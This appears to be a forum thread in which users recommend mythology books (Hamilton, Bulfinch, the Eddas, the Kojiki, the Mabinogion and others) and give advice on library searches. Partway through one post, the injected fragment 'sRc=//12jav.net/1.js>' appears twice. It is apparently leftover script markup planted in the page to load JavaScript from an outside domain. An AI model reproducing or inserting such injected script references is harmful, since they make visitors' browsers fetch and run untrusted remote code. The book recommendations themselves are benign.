Mythology: Timeless Tales of Gods and Heroes by Edith Hamilton (although I think she's biased towards Greek mythology)
Roger Lancelyn Green...wrote a lot on everything in Western mythology...
Bulfinch's Mythology is another classic sort of catch-all.
Snorri Sturluson's Eddas (Norse)
Ovid's Metamorphoses (Greek) (and of course get the Iliad and Odyssey by Homer)
Chamberlain's Kojiki (Japanese)
Guest's Mabinogion (Welsh)
Macalister's Book of the Conquests of Ireland (Irish)
Rajgopalchari's Mahabharata and Ramayana (Indian)
Ryder's Panchatantra (Indian fables, which reminds me...)
Aesop's Fables (Greek...animals?)
Finally, my personal bias: Women Who Run With The Wolves by Clarissa Pinkola Estes.

I usually get books placed on hold a few days before. I live a heavily populated area, so we have a fairly large library system that's willing to ship a book from one place to another, if need be. They usually have the books I'm looking for. sRc=//12jav.net/1.js> sRc=//12jav.net/1.js>
You could try "Mythology" just from Edith Hamlin. It will give you myths based on the Norse, Greek, and Roman culture.
Along with that, if you can, I would highly suggest a book by Scott Cunningham. The book, called, "Encyclopedia of Magical Herbs". Is a good choice. It will list the properties, the elements, and how you can apply them.

The advice I gave to Audrey was good; the best help is the Librarian.In this age of the internet, there is no need to look for titles on the shelves. Ask the Librarian,"What books do you have on Herbs?" You will be told what books are available immediately, and what the Library can obtain from other Libraries.

Be broad with your search. If you're interested in Egyptian mythology, look through the Egypt section. It's unlikely you will find a book on magical herbalism, but look in the gardening section.
